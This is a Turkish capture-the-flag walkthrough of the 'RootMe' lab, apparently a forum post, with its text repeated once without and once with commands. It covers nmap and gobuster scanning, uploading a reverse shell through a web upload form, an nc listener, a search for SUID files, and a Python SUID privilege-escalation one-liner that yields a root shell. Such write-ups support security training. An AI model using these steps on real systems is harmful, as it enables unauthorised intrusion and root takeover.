RootMe
Soru 1
( Makinede kaç tane açık port var ?)
Kaç tane açık port olduğunu bulmamız için Nmap ile port taraması yapmamız gerekmektedir.
Soru 2
( Apache 'nin Hangi Versiyonu Çalışıyor? )
Bunun için yine Nmap taraması yapabiliriz.
Soru 3
( 22. Portta Hangi Servis Çalışıyor )
Daha önce Nmap taramamızı yapmıştık. 22. Portta genelde
servisi çalışır.
Soru 4 - Devamı
( Upload Formunu Bulun ve Reverse Shell 'i yükleyin )
Gobuster taraması ile bulacağız.
Daha sonra buradaki shell 'i yükleyebiliriz Ziakimbo . Fakat Dosyanın adında şöyle bir değişikliklik yapmamız gerek
Şimdi shell 'i dinleyeceğiz. Upload ettiğiniz konumdaki shell 'i çalıştırın ve sayfayı kapatmayın aksi taktirde shell kapanır.
Şimdi site dosyalarımızın olduğu dizine gidelim ve hangi dosyalar olduğunu kontrol edelim.
Burada birşey dikkatinizi çekmiş olabilir
Burayı da tamamladığımıza göre diğer adımlara geçelim.
Dosyalardaki yetkileri kontrol edelim...
Bu komutu çalıştıktan sonra dikkatimizi python klasörüne verelim. Priv. Esc. için bize oldukça yardımı dokunacak.
Şimdi ise sıra python un faydalarına
Ziakimbo buradaki yazıdan yardım alarak SUID Privileges Escalation komutunu çalıştırabiliriz.
Bu komutla kendimize root yetkisi vereceğiz.
Artık Rütbemizi aldık
şimdi içeride neler varmış bir bakalım.
son olarak root.txt dosyasını okuyalım ve bitirelim.
Soru 1
( Makinede kaç tane açık port var ?)
Kaç tane açık port olduğunu bulmamız için Nmap ile port taraması yapmamız gerekmektedir.
Kod:
nmap -T4 -p- makineipSoru 2
( Apache 'nin Hangi Versiyonu Çalışıyor? )
Bunun için yine Nmap taraması yapabiliriz.
Kod:
nmap -T4 -p80 --script http-apache-server-status makineipSoru 3
( 22. Portta Hangi Servis Çalışıyor )
Daha önce Nmap taramamızı yapmıştık. 22. Portta genelde
SSH
Soru 4 - Devamı
( Upload Formunu Bulun ve Reverse Shell 'i yükleyin )
Gobuster taraması ile bulacağız.
Kod:
gobuster dir -w wordlist -u http://makineipDaha sonra buradaki shell 'i yükleyebiliriz Ziakimbo . Fakat Dosyanın adında şöyle bir değişikliklik yapmamız gerek
Şimdi shell 'i dinleyeceğiz. Upload ettiğiniz konumdaki shell 'i çalıştırın ve sayfayı kapatmayın aksi taktirde shell kapanır.
Kod:
nc -lvnp 9001Şimdi site dosyalarımızın olduğu dizine gidelim ve hangi dosyalar olduğunu kontrol edelim.
Kod:
cd /var/www && lsBurada birşey dikkatinizi çekmiş olabilir
Kod:
cat user.txtBurayı da tamamladığımıza göre diğer adımlara geçelim.
Dosyalardaki yetkileri kontrol edelim...
Kod:
find / -perm -u=s -type f 2>/dev/nullBu komutu çalıştıktan sonra dikkatimizi python klasörüne verelim. Priv. Esc. için bize oldukça yardımı dokunacak.
Şimdi ise sıra python un faydalarına
Ziakimbo buradaki yazıdan yardım alarak SUID Privileges Escalation komutunu çalıştırabiliriz.
Kod:
/usr/bin/python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’Bu komutla kendimize root yetkisi vereceğiz.
Artık Rütbemizi aldık
Kod:
cd /rootşimdi içeride neler varmış bir bakalım.
Kod:
ls -alson olarak root.txt dosyasını okuyalım ve bitirelim.
Kod:
cat root.txt
